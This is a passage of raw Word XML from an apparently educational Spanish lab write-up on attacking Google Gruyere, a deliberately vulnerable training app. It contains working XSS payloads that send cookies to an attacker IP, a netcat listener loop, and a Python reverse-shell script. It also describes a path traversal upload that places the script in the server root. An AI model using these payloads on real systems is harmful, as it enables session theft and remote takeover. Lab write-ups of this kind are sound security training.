        <w:t>-W: El tiempo de espera antes de que se cierre el socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241F411" w14:textId="3FDC1F69" w:rsidR="000739B1" w:rsidRDefault="006F0858" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0858">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28BC420E" wp14:editId="734BD94C">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="263" name="Imagen 2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Captura de pantalla de computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId279"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AADE113" w14:textId="30DB884F" w:rsidR="006F0858" w:rsidRDefault="006F0858" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora se queda esperando en el puerto 5000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7108FC5D" w14:textId="062BFCB1" w:rsidR="006B5E23" w:rsidRDefault="006B5E23" w:rsidP="006B5E23">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>Ahora nos conectamos en la Google Gruyere e iniciamos sesión con la cuenta ‘usuario’ ‘usuario’</w:t>
      </w:r>
      <w:r w:rsidR="006D4478">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6089CC12" w14:textId="06BE26C8" w:rsidR="006D4478" w:rsidRDefault="006D4478" w:rsidP="006B5E23">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4478">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47E282F9" wp14:editId="02C0F800">
            <wp:extent cx="5400040" cy="5805170"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="267" name="Imagen 2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Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId280"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A3886" w14:textId="180D175E" w:rsidR="000739B1" w:rsidRDefault="006D4478" w:rsidP="000739B1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Simplemente </w:t>
      </w:r>
      <w:r w:rsidR="001B2D32">
        <w:rPr>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>nos vamos a New Snippet, e ingresamos el código del paiload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BDE2CE" w14:textId="1152DCDE" w:rsidR="001B2D32" w:rsidRPr="00312E63" w:rsidRDefault="00312E63" w:rsidP="001B2D32">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="001B2D32" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.1.148:500/?".concat(document.cookie)},1010)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BA55FE" w14:textId="2F5DD41C" w:rsidR="000739B1" w:rsidRDefault="000739B1" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD2A38E" w14:textId="2416CEC0" w:rsidR="001B2D32" w:rsidRDefault="004F7585" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="004F7585">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520E6A0A" wp14:editId="6AA70279">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="270" name="Imagen 2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n 270" descr="Interfaz de usuario gráfica&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId281"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0659B8" w14:textId="18BBF420" w:rsidR="004F7585" w:rsidRDefault="004F7585" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D91263F" w14:textId="6AB34575" w:rsidR="004F7585" w:rsidRDefault="004F7585">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc128034175"/>
      <w:r>
        <w:t>Forma 2-&gt;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="7A7C8FE4" w14:textId="77777777" w:rsidR="00CE41A8" w:rsidRPr="00CE41A8" w:rsidRDefault="00CE41A8" w:rsidP="00CE41A8"/>
    <w:p w14:paraId="59EAEDF8" w14:textId="6934E17E" w:rsidR="00597BAB" w:rsidRDefault="00C716DA" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En este caso vamos a probar otro método, vamos </w:t>
      </w:r>
      <w:r w:rsidR="00536CF7">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hacerlo manualmente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD2B2F" w14:textId="48C776F0" w:rsidR="00C716DA" w:rsidRDefault="00C716DA" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>El paiload que voy a usar en este caso es este:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883B865" w14:textId="72F15530" w:rsidR="00C716DA" w:rsidRPr="00312E63" w:rsidRDefault="00312E63" w:rsidP="00FE7B0C">
      <w:pPr>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00C716DA" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//192.168.1.148:5555/?".concat(document.cookie)},1010)&gt;&lt;/body&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A773245" w14:textId="77777777" w:rsidR="00322F51" w:rsidRDefault="00135FCB" w:rsidP="00DF2697">
      <w:r w:rsidRPr="00810052">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287EF47" w14:textId="63F451B6" w:rsidR="00DF2697" w:rsidRPr="00810052" w:rsidRDefault="00322F51" w:rsidP="00322F51">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>Este código se ejecutará en la maquina atacante y sirve para crear un socket que escuche en esa IP y en el puerto 555, y que cada vez que se cierre se cree otro.</w:t>
      </w:r>
      <w:r w:rsidR="00135FCB" w:rsidRPr="00810052">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5635C1DF" w14:textId="1CB79261" w:rsidR="00DF2697" w:rsidRDefault="00A91351" w:rsidP="00DF2697">
      <w:r w:rsidRPr="00810052">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00536CF7" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>while :; do printf "js$ "; read c; echo $c | nc -lvnp 5555 &gt;/dev/null; done</w:t>
      </w:r>
      <w:r w:rsidR="00312E63" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34556C3A" w14:textId="4C25C7CF" w:rsidR="00322F51" w:rsidRDefault="00322F51" w:rsidP="00DF2697"/>
    <w:p w14:paraId="606F28C3" w14:textId="108A0E51" w:rsidR="00322F51" w:rsidRDefault="00322F51" w:rsidP="00DF2697">
      <w:r w:rsidRPr="00322F51">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B54028F" wp14:editId="3DB83D4C">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="272" name="Imagen 2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descr="Interfaz de usuario gráfica, Texto, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId282"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D072495" w14:textId="661320FF" w:rsidR="00322F51" w:rsidRDefault="00322F51" w:rsidP="00DF2697"/>
    <w:p w14:paraId="06E5D1AC" w14:textId="5BC1653B" w:rsidR="00322F51" w:rsidRDefault="004420CA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc128034176"/>
      <w:r>
        <w:t>Reverse shell:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="5B77FDFD" w14:textId="2557C481" w:rsidR="00925605" w:rsidRDefault="00925605" w:rsidP="00DF2697"/>
    <w:p w14:paraId="50D44B60" w14:textId="0A11F830" w:rsidR="008E6B91" w:rsidRDefault="00831EB3" w:rsidP="000332FB">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r>
        <w:t>En este caso voy a crear una revershe shell en Python, para poder tener acceso al sistema operativo en que corre el servidor, en este caso voy a ir explicando paso a paso el proceso</w:t>
      </w:r>
      <w:r w:rsidR="00D97E7D">
        <w:t>, como último detalle en esta introducción ejecutaré gruyere como root, para así poder tener todos los permisos en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB927ED" w14:textId="439E263A" w:rsidR="00831EB3" w:rsidRDefault="00157EE2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo primero de todo es crear el script que </w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:t>va a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> crear la shell reversa en este caso el script será de </w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>, en concreto Python 2</w:t>
      </w:r>
      <w:r w:rsidR="00B726BB">
        <w:t>.7, porque es el que usa Google Gruyere</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730EADFE" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535D64C" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># Importar los módulos necesarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6AE02D" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826EB87" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282650F8" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FCF30A" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304A245" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D21086" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># Crear un objeto socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0CE40" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21856AD5" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16603157" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># Conectar el socket a un host y puerto especificados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351A6C8" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>host = '192.168.1.148'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7807C4" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>port = 5555</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCEE47E" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>s.connect((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55206ABF" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57AC0B56" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># Redirigir la entrada, salida y error estándar al socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BB5EF" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>os.dup2(s.fileno(), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BF8DE8" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>os.dup2(s.fileno(), 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3CF53" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>os.dup2(s.fileno(), 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B259F62" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D6052BD" w14:textId="77777777" w:rsidR="00F52ABB" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t># Ejecutar un shell interactivo de Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000B795C" w14:textId="6B4C9D48" w:rsidR="008E6B91" w:rsidRPr="00312E63" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>p = subprocess.call(["/bin/bash","-i"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753ABCBA" w14:textId="69672939" w:rsidR="00F52ABB" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A56113" w14:textId="1B2046D7" w:rsidR="00F52ABB" w:rsidRDefault="00F52ABB" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00F52ABB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72E658F7" wp14:editId="424F5382">
            <wp:extent cx="5400040" cy="5454869"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="276" name="Imagen 27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Una captura de pantalla de una computadora&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId283"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5412008" cy="5466958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A75FB" w14:textId="77777777" w:rsidR="00BF61D2" w:rsidRDefault="00BF61D2" w:rsidP="00F52ABB">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A8412F" w14:textId="64591281" w:rsidR="00F52ABB" w:rsidRDefault="00F52ABB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Una vez que tenemos el script creado tenemos que subirlo al servidor, para eso voy a usar la vulnerabilidad de ‘Path Transversal’, para eso con el usuario ‘..’ y contraseña ‘..’</w:t>
      </w:r>
      <w:r w:rsidR="00C107A6">
        <w:t xml:space="preserve"> (El problema aquí es que Gruyere crea los usuario dentro de una carpeta con su nombre en la raíz, del servidor, pero al poner ‘..’ de nombre de usuario se crea directamente en la raíz, por lo tanto, cuando suba un fichero lo subiré a la raíz.)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, subiré este archivo al servidor con eso conseguiré que se suba en la carpeta raíz </w:t>
      </w:r>
      <w:r w:rsidR="00D97E7D">
        <w:t>del servidor</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E0808" w14:textId="1726F5B9" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CAD7360" w14:textId="074BD218" w:rsidR="00D97E7D" w:rsidRDefault="00D97E7D" w:rsidP="00D97E7D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00D97E7D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584A7FD1" wp14:editId="5071106F">
            <wp:extent cx="5400040" cy="5805170"/>
